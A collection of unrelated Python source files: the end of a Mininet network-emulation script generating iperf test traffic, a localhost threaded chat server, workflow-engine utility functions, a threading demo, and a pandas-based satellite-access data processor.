info("[%s] h7 to h2 : ended failure, starting traffic 2\n",datetime.now())
net.hosts[6].cmd("iperf -u -t 30 -c 10.0.0.2 -b 500M ") #150
info("[%s] h7 to h2 : ended traffic 2\n",datetime.now())
net.hosts[6].cmd("iperf -u -t 30 -c 10.0.0.2 -b 500M ") #150
info("[%s] h7 to h2 : ended traffic 3\n",datetime.now())
net.hosts[6].cmd("iperf -u -t 30 -c 10.0.0.2 -b 500M ") #150
info("[%s] h7 to h2 : ended traffic 4\n",datetime.now())
net.hosts[6].cmd("iperf -u -t 30 -c 10.0.0.2 -b 500M ") #150
info("[%s] h7 to h2 : ended traffic 5\n",datetime.now())
net.hosts[6].cmd("iperf -u -t 500 -c 10.0.0.2 -b 500M ") #150
info("[%s] h7 to h2 : ended traffic 6\n",datetime.now())
# time.sleep(105)
# net.hosts[6].cmd("iperf -u -t 300 -c 10.0.0.7 -b 400M ")
# info("h6 to h2 : ended traffic 2\n")
class MultiSwitch( OVSSwitch ):
"Custom Switch() subclass that connects to different controllers"
def start( self, controllers ):
return OVSSwitch.start( self, [ cmap[ self.name ] ] )
c1 = RemoteController('c1', ip=sys.argv[1], port=6633)
cmap = { 's0': c1,'s1': c1, 's2': c1, 's3':c1, 's4':c1, 's5': c1, 's6': c1, 's7':c1, 's8':c1, 's9': c1, 's10': c1 }
#cmap = { 's1': c1}
net = Mininet(topo=None, cleanup=True, link=TCLink, autoSetMacs=True, switch=MultiSwitch, build=False )
for c in [ c1 ]:
net.addController(c)
hosts = []
for i in range(1,11):
hosts.append(net.addHost('h'+str(i)))
switches = []
for j in range(1,11):
switches.append(net.addSwitch('s'+str(j)))
#inner ring
net.addLink(switches[0], switches[1], 1,1)
net.addLink(switches[1], switches[2], 2,1)
net.addLink(switches[2], switches[3], 2,1)
net.addLink(switches[3], switches[4], 2,1)
net.addLink(switches[4], switches[0], 2,2)
#outer switches
net.addLink(switches[0], switches[5], 3,1)
net.addLink(switches[1], switches[6], 3,1)
net.addLink(switches[2], switches[7], 3,1)
net.addLink(switches[3], switches[8], 3,1)
net.addLink(switches[4], switches[9], 3,1)
#hosts
net.addLink(switches[5], hosts[0], 2)
net.addLink(switches[5], hosts[1], 3)
net.addLink(switches[6], hosts[2], 2)
net.addLink(switches[6], hosts[3], 3)
net.addLink(switches[7], hosts[4], 2)
net.addLink(switches[7], hosts[5], 3)
net.addLink(switches[8], hosts[6], 2)
net.addLink(switches[8], hosts[7], 3)
net.addLink(switches[9], hosts[8], 2)
net.addLink(switches[9], hosts[9], 3)
#net.addLink(switches[10], hosts[9], 2)
#net.addLink(switches[10], hosts[10], 3)
info( '*** StartING network\n')
net.build()
net.start()
#tl = threading.Thread(target=thread_launch,args=(net, ))
#tl.start()
#info("Started network\n")
#tt1 = threading.Thread(target=thread_traffic,args=(net,8,'10.0.0.1', ))
#tt1 = threading.Thread(target=thread_traffic,args=(net,9,'10.0.0.1', '67M', ))
#tt2 = threading.Thread(target=thread_traffic,args=(net,9,'10.0.0.1', '42M', ))
#tl.join()
#tt2.start()
#tt1.start()
#time.sleep(30)
#net.dumpNodeConnections( net.nodelist )
#for node in net.nodeList:
theLinks = []
for node in net.items():
info( '%s\n' % repr( node[1] ) )
info('\n----------------\n')
for lk in net.links: #linksBetween(switches[9],hosts[8])
#info('%s\n' % repr(lk.intf1))
info(lk.intf1.name+'<->'+lk.intf2.name+' '+lk.status()+"\n")
info(lk.intf1.name+ ' ['+lk.intf1.mac+']<->'+lk.intf2.name+ '['+lk.intf2.mac+']\n')
t1 = threading.Thread(target=thread_t1,args=(net, ))
info(" t1 created\n")
t2 = threading.Thread(target=thread_t2,args=(net, ))
info(" t2 created\n")
t2.start()
info(" t2 started\n")
t1.start()
info(" t1 started\n")
tf = threading.Thread(target=thread_failure,args=(net, ))
tf.start()
info(" t failure started\n")
tf.join()
info(" tf joined\n")
info('-------------------\n')
for lk in net.links: #linksBetween(switches[9],hosts[8])
info(lk.intf1.name+'<->'+lk.intf2.name+' '+lk.status()+"\n")
t2.join()
info(" t2 joined\n")
t1.join()
info(" t1 joined\n")
#time.sleep(10)
#net.hosts[9].cmd("iperf -u -t 30 -c 10.0.0.1 -b 28M ")
#info("triggered traffic 1\n")
#net.hosts[9].cmd("iperf -u -t 40 -c 10.0.0.1 -b 42M ")
#info("triggered traffic 2\n")
#net.hosts[9].cmd("iperf -u -t 20 -c 10.0.0.1 -b 130M ")
#info("triggered traffic 3\n")
#net.hosts[9].cmd("iperf -u -t 30 -c 10.0.0.1 -b 70M ")
#info("triggered traffic 4\n")
#net.hosts[9].cmd("iperf -u -t 60 -c 10.0.0.1 -b 500M ")
#info("triggered traffic 5\n")
#net.hosts[9].cmd("iperf -u -t 30 -c 10.0.0.1 -b 30M ")
#info("triggered traffic 6\n")
#net.hosts[9].cmd("iperf -u -t 30 -c 10.0.0.1 -b 200M ")
#info("triggered traffic 7\n")
#tt2.start()
#net.hosts[9].sendCmd("iperf -u -t 90 -c 10.0.0.1 -b 30M ")
#info("triggered traffic 2\n")
#tf = threading.Thread(target=thread_failure,args=(net, ))
#tf.start()
#info("triggered failure")
# tc = threading.Thread(target=thread_console,args=(net, ))
# tc.start()
# info("Triggered Terminal")
#tl.join()
#tt1.join()
#tt1.join()
#info("Completed 1 joins")
#tt2.join()
#tl.join()
#tf.join()
#tc.join()
#info("Completed 2 joins")
#time.sleep(240)
net.stop()
|
task_4_server.py
|
import socket
import threading
def display_msg(author, msg):
for client in clients:
if author != client:
client.send(msg.encode())
def client_handler(sock, address):
print(f"{address[0]}:{address[1]} connected")
while True:
message = sock.recv(16384).decode("utf-8")
if len(message) == 0:
break
message = f"{address[0]}:{address[1]}: " + message
display_msg(sock, message)
print(f"{address[0]}:{address[1]} disconnected")
clients.remove(sock)
sock.close()
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = ("127.0.0.1", 9090)
serversocket.bind(server_address)
serversocket.listen(100)
clients = []
print(f"Starting Chat Server at {server_address[0]}:{server_address[1]}")
try:
while True:
clientsocket, client_address = serversocket.accept()
if clientsocket not in clients:
clients.append(clientsocket)
client_thread = threading.Thread(target=client_handler, args=(clientsocket, client_address))
client_thread.start()
except KeyboardInterrupt:
print("\n" + "Shutting down" + "\n")
serversocket.close()
|
builtin_units.py
|
import os, logging
from alchemy import engine, flow, unit
log = logging.getLogger(__name__)
def foreach(ctx, item, iteron, units, dryrun=False):
newctx = ctx
ui_list = [unit.create_unit_inst_from_dict(d) for d in units]
for i in iteron:
newctx.values[item] = i
engine.run_ui_list(newctx, ui_list, allow_flow=True)
def spawn_thread(ctx, units, name=None, join=False, newctx=False, dryrun=False):
from threading import Thread
def target_fn(ctx, ui_list, allow_flow = False):
try:
engine.run_ui_list(ctx, ui_list, allow_flow = allow_flow)
except Exception, e:
log.exception(e)
ctx.fault_obj = e
ctx.fault = True
log.info("Spawing thread, name = %s", name)
if newctx:
ctx = engine.clone_context(ctx)
ui_list = [unit.create_unit_inst_from_dict(d) for d in units]
t = Thread(target=target_fn, name=name, args=(ctx, ui_list), kwargs={'allow_flow': True})
t.start()
if join:
t.join()
if ctx.fault_obj:
raise ctx.fault_obj
def print_ctx(ctx, param_list):
"""
param_list: List of context variables to be printed. If null, then print all
"""
print "--- ctx start --"
if param_list is None:
for key, value in ctx.values.iteritems():
print "{0} = {1}".format(key, value)
else:
for p in param_list:
try:
print "{0} = {1}".format(p, ctx.values[p])
except KeyError:
print "Param [%s] not found" % p
print "--- ctx end --"
def define_context(ctx, varmap, dryrun=False):
"""
values: Dict of values, where each key:value is a mapping to set the context
out: Updates the context directly
Example:
values:
a: $b
c: 1
d: "hello"
This defines 3 context variables a,c & d. The value of a is set as the
value of context var 'b'
"""
new_values = engine.resolve_dict(ctx, varmap)
if dryrun:
return varmap
ctx.values.update(new_values)
def loop(ctx, count, units, dryrun=False):
ui_list = [unit.create_unit_inst_from_dict(d) for d in units]
for _ in range(count):
engine.run_ui_list(ctx, ui_list, allow_flow=True)
def run_command(ctx, cmd, errordup = False, background = False, ignore_error = False, dryrun=False):
"""
cmd: The command string e.g. "uname -a"
errdup: (False) Duplicate stderr to stdout
background: (False) Run the command in background i.e. the unix '&'
ignore_error: (False) Do not fault if the cmd fails with non-exit code
out:
status_code: The OS exit code of a process
stdout: The stdout stream
stderr: The stderr stream
"""
if dryrun:
return {
'status_code': None,
'stdout': None,
'stderr': None,
}
cmd = cmd.format(**ctx.values)
import subprocess
o_status_code = 0
o_stdout = None
o_stderr = None
if errordup:
o_stderr = subprocess.STDOUT
else:
o_stderr = subprocess.PIPE
if background:
out = subprocess.Popen(cmd ,shell=True)
o_status_code = [0]
o_stdout = None
o_stderr = None
else:
out = subprocess.Popen(cmd ,shell=True, stdout=subprocess.PIPE, stderr=o_stderr)
o_status_code = out.returncode
o_stdout = out.communicate()[0].split('\n')
unit_status = True
if not ignore_error and (o_status_code is not None and o_status_code != 0):
unit_status = False
return {
'_status': unit_status,
'status_code': o_status_code,
'stdout': o_stdout,
'stderr': o_stderr,
}
def print_stream(stream, dryrun = False):
"""
stream: Any valid file like object or stdout, strerr
"""
if dryrun:
return
if not stream:
return
for line in stream:
print line.rstrip()
def cli_args_positional(spec, dryrun=False):
"""
spec: list of positional args
out:
'spec: [a,b]' gets converted to ctx params 'input_a', 'input_b'
"""
if dryrun:
args = {}
for arg in spec:
args['input_' + arg] = ""
return args
import sys
if len(sys.argv[4:]) < len(spec):
print "Error: not enough args"
print "args:", " ".join(["<{0}>".format(a) for a in spec])
raise Exception("Not enough CLI args")
args = {}
for i, arg in enumerate(spec):
args['input_' + arg] = sys.argv[3 + i+1]
return args
def to_int(varlist, dryrun=False):
"""
varlist: List of context parameters
out:
Updates the context after the type conversion
"""
if dryrun:
return {v: None for v in varlist}
return {v: int(v) for v in varlist}
def parse_yaml_file(filename):
"""
filename: Input Yaml filepath
out:
export data as is into the context
"""
try:
import yaml
with open(filename) as f:
data = yaml.load(f)
return data
except Exception as e:
print "Error: unable to open yml file: %s, err = %s" % (filename, str(e))
return {
'_status': False
}
def env_values(varlist, dryrun=False):
"""
varlist: List of env variables
out:
Each env var X is exported as ENV_X in the context
"""
if dryrun:
return {"ENV_" + v: None for v in varlist}
ctx_vars = {}
for v in varlist:
ctx_vars["ENV_" + v] = os.environ[v]
return ctx_vars
def to_list(ctx, varlist):
"""
varlist: Values to be converted to python list by resolving the parameters
out:
list: List of values after resolving
Example:
varlist:
- 1
- 2
- $x
If the x == 10 then output will be [1,2,10]
"""
l = engine.resolve_list(ctx, varlist)
return {'list': l}
def delete_ctx(ctx, varlist):
"""
varlist: List of context variables which need to be deleted
"""
for v in varlist:
del ctx.values[v]
def ctx_required(ctx, varlist, dryrun=False):
"""
varlist: List of context variables which must exist in the context
"""
if dryrun:
return {v: '' for v in varlist}
for v in varlist:
if not v in ctx.values:
raise Exception("Context variable [%s] is required but not found" % v)
def dict_to_ctx(dict_var, keys = None):
if not isinstance(dict_var, dict):
raise Exception("Dict to ctx, the dict_var must be a dict")
if keys is None:
return dict_var
else:
d = {}
for k in keys:
d[k] = dict_var[k]
return d
def to_str(var):
return {'str_var': str(var)}
def query_dict(ctx, dict_var, pathmap, separator = '/', dryrun=False):
if dryrun:
return pathmap
for ctx_var, dict_path in pathmap.iteritems():
keylist = dict_path.split(separator)
val = dict_var
for key in keylist:
if not isinstance(val, dict):
raise Exception("Key=[%s] in path=[%s] is not a dict" % (key, dict_path))
try:
val = val[key]
except KeyError:
raise Exception("key=[%s] in path=[%s] not found" % (key, dict_path))
ctx.values[ctx_var] = val
def write_yaml_file(yaml_data, filepath):
import yaml
with open(filepath, "w") as f:
data = yaml.dump(yaml_data)
f.write(data)
def load_yaml_file(filepath, dryrun=False):
if dryrun:
return {'yaml_data': ''}
import yaml
with open(filepath) as f:
y = yaml.load(f)
return {'yaml_data': y}
def format_str(ctx, varmap, dryrun=False):
if dryrun:
return varmap
log.info("format-str varmap: %s", varmap)
ret = {}
for key, pattern in varmap.iteritems():
log.info("format_str: exporting var = %s", key)
ret[key] = pattern.format(**ctx.values)
return ret
if __name__ == '__main__':
class A:
pass
c = A()
c.values = {}
d = {
'a': {
'b': 10,
'c': {
'c1': [1,2,3]
}
}
}
path = {
'x': 'a/b',
'y': 'a/c',
'z': 'a/c/c1',
}
query_dict(c, d, path)
print c.values
|
th.py
|
###### 多线程 daemon守护线程test
import time
import threading
def fun():
for i in range(5):
# print("start fun")
time.sleep(1)
print("fun1")
def fun2(a):
while 1:
time.sleep(1)
print(a,"end fun2")
def main():
# print("main thread")
t1 = threading.Thread(target=fun,args=())
t2 = threading.Thread(target=fun2, args=(2,))
# t1.setDaemon(False)
t2.setDaemon(True)
t1.start()
t2.start()
# time.sleep(2)
# t1.join()
# t2.join()
# print("main thread end")
if __name__ == '__main__':
main()
|
aer_dataset.py
|
from tqdm import tqdm
import pandas as pd
from path import Path
import random
import math
import numpy as np
import itertools
import datetime
import os
import networkx as nx
from utils.tool import time_stat,get_now
from components.AcTik import Tik
import threading
from components.measurement import Procedure,get_df
from utils.tool import json2dict,dict2json,to_csv,read_csv
import errno
class AerDataset:
def __init__(self,config,terminal=False):
pass
self.path = Path(config['path'])
self.terminal = terminal
#data prep
self.doOrNot = bool(config['Do'])
self.assigned_units = config['assigned_units']
self.access_portion = config['access_portion']
self.time_duration = config['time_duration']
self.files = []
for file in config['files']:
self.files.append(self.path / file)
self.dump_file = self.path / "{}.csv".format(config['dump_stem'])
#data align
self.algorithm_base = config['algorithm_base']
self.input_metrics = config['input_metrics']
self.output_metrics = config['output_metrics']
self.access_len = 0
#time_dir = datetime.datetime.now().strftime("%m-%d-%H:%M")
self.data_description={}
def get_time(self,t):
return self.df_align.index[t]
def is_equal(self, s1, s2, tk):
try:
a, b = tuple(self.df_align.query(" time >={} and time <={}".format(tk - 1, tk))[s1])
c, d = tuple(self.df_align.query(" time >={} and time <={}".format(tk - 1, tk))[s2])
except IOError:
print("equal func wrong at {},{},{}".format(s1,s2,tk))
return
if (a > c and b < d) or (a < c and b > d):
return True
else:
return False
def description(self):
print("DATA DESCRIPTION")
for k,v in self.data_description.items():
print("-> {},:{}",k,v)
def passes_stat(self):
for key, value in self.crossLog.items():
print("{}: {}".format(key, len((value))))
def get_sublines(self, access_name, value, with_time=False):
'''
hidden param
self.crossLog
self.df
called by
self.load_align
out
:param access_name:
:param value_names:
:param with_time:
:return:
'''
for start, end in self.crossLog[access_name]:
if with_time:
sub_df = self.df.query("access == '{}' and time >={} and time <={}".format(access_name, start, end))[
['time'] + value]
else:
sub_df = self.df.query("access == '{}' and time >={} and time <={}".format(access_name, start, end))[
value]
yield np.array(sub_df)
def data_append_value(self,df,input_metrics,output_metrics):
#append the data to df
# freq = 12e9#12GHz
# opt_v = 3e8#300k
# wave_lambda = 0.025# m
# Pr = (wave_lambda)**2/( 4*math.pi*df['Range (km)'].astype(float)*1e3)**2
# data = np.log10(Pr*1000)
#
f = 12 #Ghz
log_2_10 = 3.321928094887362
lg12 = 1.0791812
EIRP = 35 #dBW
GT = 8.53 #dBi/K
Gt = 40 #dB
Gr = 40 #dB
k = -228.6 #dBW/K
L = 30 #dB
B = 2 #GHz
# d = df['Range (km)'].max() - df['Range (km)']
d = df[input_metrics]
d = d['Range (km)']
Lf = 92.45 + 20 * np.log10(d) + 20 * np.log10(f)
for item in output_metrics:
if item =='Cno(dBHz)':
Cno = EIRP +GT -k-Lf-100
Cno = Cno.rename( item)
df = pd.concat([df, Cno], axis=1)
if item =='CT(dBW/K)':
CT = EIRP + GT -Lf
CT = CT.rename(item)
df = pd.concat([df, CT], axis=1)
if item == 'Pr(dBW)':
Pr = EIRP + Gr - Lf+100
Pr = Pr.rename(item)
df = pd.concat([df, Pr], axis=1)
if item =='(Ct)Gbps':
pass
if item =='CT(W/K)' and 'CT(dBW/K)' in df.columns:
pass
return df
def data_prep(self):
'''
:param :
self.time_portion
self.access_portion
self.assigned_units
self.files
self.random_seed
:return:
a data frame file
'''
if self.doOrNot is False:
return
if self.terminal:
print("\nDATA PRE-PROCCESSING ...")
#input
files = self.files
assigned_units = self.assigned_units
input_metrics = self.input_metrics
output_metrics = self.output_metrics
names = ['access','idx', 'time', 'value']
# names_type = {'access':str,'idx':np.int32, 'time':np.float32}#, 'value':np.float32}
not_dup_columns=['value']
output_columns = ['access','idx','time']+assigned_units
dfs = []
if self.terminal:
print("-> regexing ...")
for idx,(item,unit) in enumerate(zip(files,assigned_units)):# 载入距离, 速度, 等不同value其他文件
df = pd.read_csv(filepath_or_buffer=item,
names=names,
encoding='utf-16',
delimiter=",|\t",
# converters=names_type
)
if unit=="Range (km)":
df['access'] = df['access'].str.replace(r'(.*)-(.*)', r'\1', regex=True)
df['access'] = df['access'].str.replace(r'Range',r'')
df['access'] = df['access'].str.replace(r'\(.*?\)',r'')
df['access'] = df['access'].str.replace(r'\s+', r'', regex=True)
elif unit=="RangeRate (km/sec)":
df['access'] = df['access'].str.replace(r'(.*)-(.*)', r'\1', regex=True)
df['access'] = df['access'].str.replace(r'\(*\)',r'')
df['access'] = df['access'].str.replace(r'(.*)/(.*)', r'', regex=True)
df['access'] = df['access'].str.replace(r'RangeRatekmsec',r'')
df['access'] = df['access'].str.replace(r'\s+', r'', regex=True)
df['access'] = df['access'].str.replace('term-To-','')
if idx>0:
df=df[not_dup_columns]
df=df.rename(columns={'value': unit})
dfs.append(df)
if self.terminal:
print('-> regex over')
df = pd.concat(dfs,axis=1)
df=df[output_columns]
df.replace(' ', 'nan', inplace=True)
df['time'] = df['time'].astype(float)
df = df.query('time%1==0')
df['time'].loc[:] = df['time'].loc[:].astype('int')
df['Range (km)'].loc[:] = df['Range (km)'].loc[:].astype('float64')
df = self.data_append_value(
df,
input_metrics=input_metrics,
output_metrics=output_metrics
)
if self.terminal:
print('-> data saved at:{}'.format(self.dump_file))
df.to_csv(self.dump_file, index=False)
def load_align(self,random_seed=None):
'''
:input:
self.dump_file
:return:
self.df = df #for data align
self.crossLog = crossLog
self.access_names = access_names
self.data_description = data_description
'''
if self.terminal:
print("\nDATA RE-LOADING AND ALIGN")
time_duration = self.time_duration
access_portion = self.access_portion
df = pd.read_csv(self.dump_file)
algorithm_base = self.algorithm_base
output_metrics = self.output_metrics
df['time'] = np.array(df['time']).astype(np.int32)
df['access'] = np.array(df['access']).astype(str)
if self.terminal:
print(df[['Range (km)']+output_metrics].describe())
if random_seed:
random.seed(random_seed)
# time selection
time_len = int(df['time'].max())
start=0
end= 0
if type(time_duration)==list:
start = math.floor(time_len * time_duration[0])
end = math.ceil(time_len * time_duration[1])
elif type(time_duration) == int:
start = random.randrange(0,time_len-time_duration)
end = start+time_duration
else:
print('ERROR IN TIME DURATION')
exit(-1)
df = df.query('time >= {} and time <={} '.format(start, end))
# access selectoin
access_dict = dict(df['access'].value_counts())
access_names = list(access_dict.keys())
random.shuffle(access_names)
start = math.floor(len(access_names) * access_portion[0])
end = math.ceil(len(access_names) * access_portion[1])
access_names = access_names[start:end]
df = df.query('access in {} '.format(access_names))
# data type set
# 每个access 可能有多次过境, 将timestamp记录一下, 后面绘图, 或者数据处理都需要用
crossLog={}
for name in access_names:
time_seriers = df.query("access == '{}'".format(name))['time']
#相或得到time start or end mask
fwd = time_seriers.diff(-1)
pwd = time_seriers.diff(1)
time_np = np.array(time_seriers)
inter_mask = np.array(((abs(fwd)>1 ) + (abs(pwd)>1)))
if time_np[0]%1 ==0:
inter_mask[0] =True
else:
inter_mask[1]=True
if time_np[-1]%1 ==0:
inter_mask[-1]=True
else:
inter_mask[-2]=True
time_stamp = np.array( time_np[inter_mask]) #连续的两个代表着开始和结束
cnt = 0
crossLog[name]=[]
while cnt <len(time_stamp):# 如果有2*n个数, 就说明过境n次
crossLog[name].append(
(math.ceil(time_stamp[cnt]),math.floor(time_stamp[cnt+1]))# 可能有多次过境, 所以是append
)
cnt=cnt+2
self.crossLog = crossLog
self.df = df
#data align
time_access_names = access_names.copy()
time_access_names.insert(0, 'time')
df_align = pd.DataFrame(columns=time_access_names)
time_min = math.ceil(df['time'].min())
time_max = math.ceil(df['time'].max())
df_align_time = pd.Series(name='time', data=np.linspace(start=int(time_min), stop=int(time_max),
num=int(time_max - time_min + 1)))
df_align['time'] = np.array(df_align_time).astype(np.int32)
df_align.set_index(['time'], inplace=True)
# get time lines
for access_name in access_names:
for line, (start, end) in zip(self.get_sublines(access_name, algorithm_base), crossLog[access_name]):
sub_df = df.query("access == '{}' and time >={} and time <={}".format(access_name, start, end))[
['time'] + algorithm_base]
time_mask = (df_align.index >= start) * (df_align.index <= end)
try:
df_align[access_name][time_mask] = list(sub_df[algorithm_base[0]])
# if go wrong here, check the original access file,
except :
print("-> wrong in access: {}, check the original file".format(access_name))
# returns
data_description = {}
data_description['access_num'] = len(access_names)
data_description['time_min'] = time_min
data_description['time_max'] = time_max
self.data_description = data_description
self.access_names = access_names
self.df_align = df_align
def data_parse(self):
if self.terminal:
print('\n-> DATA PARSING...')
start = get_now()
self.__tiks_init()
self.__get_positions()
self.__get_acc2tk()
self.__accs_init()
time_stat(start)
def make_tik(self,all_tks_supremum,tiks ,start,stop):
for i in range(start,stop):
tk = all_tks_supremum[i]
pass
if tk in tiks.keys():
return
# for tk in tqdm( all_tks_supremum):#短板, 时间过长
row = self.df_align.loc[tk]
ss = list(row[True ^ pd.isnull(row)].index)
tik =Tik(tk)
# tiks[tk]['pass_in'] = []
# tiks[tk]['pass_out'] = []
# tiks[tk]['inter']=[]
for si in ss:
if pd.isnull(self.df_align[si][tk-1]):#前一个时刻,si为nan, si该时刻为pass in
tik.addPass(addPassIn=si)
# tik.passIn.add(si)
if pd.isnull(self.df_align[si][tk+1]):# 后一个时刻, si为nan, si该时刻为pass out
tik.addPass(addPassOut=si)
for si,sj in itertools.combinations(ss,2):#任选两个,查看是否inter
if self.is_equal(si,sj,tk):
if len(tik.getPass('Inter'))==0 : #是首个inter点
tik.addPass(addPassInter={si,sj})
continue#for
if tik.is_inInter(si) is False and tik.is_inInter(sj) is False:# 没有元素存在list里
tik.addPass(addPassInter={si,sj})
continue#for
#双方中有一方, 存在list的任意元素中(set), {si,sj}就并到set[i]中
i = 0
while not {si,sj}&tik.getPass('Inter')[i]:
i+=1
tik.getPass('Inter')[i]|={si,sj}
tik.rebuild()
if tik.class_id=='O':
pass
else:
tiks[tk]= tik
def __tiks_init(self):
'''
算法数据准备, get tks
args:
self.df_align
crossLog
:return:
self.all_tks
self.acc2tk
self.tk2acc
'''
#如何快速检测函数交点
# 1. 对每行排序, 并输出arg序号值
# 2. 对序号值差分
# 3. 如果有绝对值大或等于1的, 就说明这行出现函数交点
# 4. 为了
argsort = np.argsort(np.array(self.df_align[self.access_names].replace(np.nan,np.inf)))
tk_mask1 = np.abs(argsort - np.concatenate([argsort[0].reshape(1,argsort.shape[1]),argsort[:-1]],0))>0
argsort = np.argsort(np.array(self.df_align[self.access_names].replace(np.nan, -np.inf)))
tk_mask2 = np.abs(argsort - np.concatenate([argsort[0].reshape(1, argsort.shape[1]), argsort[:-1]], 0)) > 0
tk_mask = tk_mask1 +tk_mask2
tk_mask_zip = tk_mask.sum(1)>0
#进去出去都是 1,补上
tk_mask_zip[0] = True
tk_mask_zip[-1]=True
# 1. passes tks
crossLog_np = np.array(list(self.crossLog.values())).reshape([len(self.crossLog), 2])
pass_tks = list(np.array(list(self.crossLog.values())).reshape([len(self.crossLog)*2]))
pass_tks =list(set(pass_tks))
pass_tks.sort()
max_tks = crossLog_np.max()
min_tks = crossLog_np.min()
pass_out_tks = list(crossLog_np[:,1])
pass_out_tks.sort()
# 2. all tks #矫正一下离境时刻, 原来的离境时刻timestamp都大了1s,入境时间是对的.
all_tks = list(self.df_align[tk_mask_zip].index)
for i,tk in enumerate(all_tks):
if tk-1 in pass_out_tks:
all_tks[i] -=1
tk_mask_zip[tk-min_tks-1] = True
# tk_mask_zip[tk-min_tks] = False
all_tks_supremum = list(self.df_align[tk_mask_zip].index)
#min tks 是最开始的全局时刻, 可能在0-24*3600 之间
if self.terminal:
print('--> all tks sup:{}'.format(len(all_tks_supremum)))
tiks = {}
#边界先处理
for tk in [min_tks,max_tks]:
row = self.df_align.loc[tk]
ss = list(row[True ^ pd.isnull(row)].index)
tik = Tik(tk)
[tik.addPass(addPassIn=si) for si in ss]
tik.rebuild()
if tik.class_id=='O':
pass
else:
tiks[tk]= tik
# 多线程处理最耗时部分
threads = []
if len(all_tks_supremum)<100:
pass
t = threading.Thread(target=self.make_tik, args=(all_tks_supremum, tiks, 1, len(all_tks_supremum)-1))
t.start()
threads.append(t)
else:
each_thread_carry = 10
for n in range(1,len(all_tks_supremum),each_thread_carry):
if n +each_thread_carry<=len(all_tks_supremum):
stop = n + each_thread_carry
else:
stop = len(all_tks_supremum)
t = threading.Thread(target=self.make_tik,args=(all_tks_supremum,tiks,n,stop))
threads.append(t)
t.start()
for t in threads:
t.join()
inter_tks = []
passIn_tks = []
passOut_tks = []
all_tks = list(tiks.keys())
for tk, tik in tiks.items():
if len(tik.passInter) != 0:
inter_tks.append(tk)
if len(tik.passIn)!=0:
passIn_tks.append(tk)
if len(tik.passOut) != 0:
passOut_tks.append(tk)
inter_tks.sort()
passIn_tks.sort()
passOut_tks.sort()
all_tks.sort()
#returns
self.inter_tks = inter_tks
self.passIn_tks = passIn_tks
self.passOut_tks = passOut_tks
self.all_tks = all_tks
self.tiks = tiks
#
if self.terminal:
print("--> tks init over, num of tks:"
"\n--> inter tks:{}".format(len(inter_tks)),
"\n--> pass in tks:{}".format(len(passIn_tks)),
"\n--> pass out tks:{}".format(len(passOut_tks)),
"\n--> all tks:{}".format(len(all_tks)))
def __accs_init(self):
accs=[]
si_names = self.access_names.copy()
while len(si_names)>0:
min_si = si_names[0]
for si in si_names:
try:
if self.acc2tk[si][0] < self.acc2tk[min_si][0]:
min_si =si
except:
print('error',si)
accs.append(min_si)
si_names.remove(min_si)
self.accs = accs
def __get_positions(self):# 迁移到drawer去
position = {}
for acc in self.access_names:
(tk_in, tk_out) = self.crossLog[acc][0] # 这里只能允许一个星过境一次, 不够一般性
y = self.df_align.query(" time >={} and time<={}".format(tk_in, tk_out))[acc].max()
x = math.ceil(((tk_in + tk_out) / 2 - self.all_tks[0]) / 10)
position[acc] = (x, y)
self.position = position
def __get_acc2tk(self):
'''
根据tiks, 输出acc2tk dict
:return:
'''
# self.tikss
# self.
#O(mn-)
acc2tk={}
for si in self.access_names: #O(m)
acc2tk[si]=[]
if si =='s3217':
pass
for tk ,tik in self.tiks.items():#O(n-)
if tik.is_inInter(si):
acc2tk[si].append(tk)
if si in tik.getPass('In'):
acc2tk[si].append(tk)
elif si in tik.getPass('Out'):
acc2tk[si].append(tk)
acc2tk[si] = list(set(acc2tk[si]))# 去重
acc2tk[si].sort()
self.acc2tk = acc2tk
def getInterTk(self,si,sj):
# print(si,sj)
if si =='none' and sj is not 'none':
return self.acc2tk[sj][0]
if si is not 'none' and sj =='none':
return self.acc2tk[si][-1]
for tk in self.inter_tks:
inters = self.tiks[tk].getPass('Inter')
for inter in inters:
if {si,sj}&inter =={si,sj}:
return tk
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.